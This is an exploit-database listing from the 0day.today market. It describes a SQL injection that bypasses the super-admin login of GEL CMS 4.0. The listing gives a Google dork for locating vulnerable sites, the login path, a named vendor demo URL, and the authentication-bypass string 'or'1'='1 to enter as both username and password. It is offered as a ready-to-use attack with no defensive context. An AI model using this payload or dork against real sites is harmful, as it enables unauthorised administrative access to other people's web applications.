[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GEL CMS 4.0 SQL Injection Vulnerability

Author
Guillermo Garcia Marcos
Risk
[
Security Risk High
]
0day-ID
0day-ID-22514
Category
web applications
Date add
13-08-2014
Platform
php
ad8888888888ba           Bypass super-Admin GEL4.0
dP'         `"8b,
8  ,aaa,       "Y888a     ,aaaa,     ,aaa,  ,aa,
8  8' `8           "8baaaad""""baaaad""""baad""8b
8  8   8              """"      """"      ""    8b
8  8, ,8         ,aaaaaaaaaaaaaaaaaaaaaaaaddddd88P
8  `"""'       ,d8""
Yb,         ,ad8"
 "Y8888888888P"


# Exploit Title: SQLi Bypass super-admin GEL CMS 4.0
# Google Dork: inurl:/contact-us_id7.php
# Date: 11 August 2014
# Exploit Author: Guillermo Garcia Marcos @GuilleSec
# Severity: High
# Vendor Homepage: http://www.oklahoma-website-design.com/
# Software Link: http://www.oklahoma-website-design.com/
# Versions: 4.00 and latest versions.
# Tested on: Debian (Apache+MySQL)

DEMO: http://www.oklahoma-website-design.com/login.php

Loginpanel:

           domain.lol/login.php

SQL string:

            Username: 'or'1'='1
            Password: 'or'1'='1

#  0day.today [2024-12-26]  #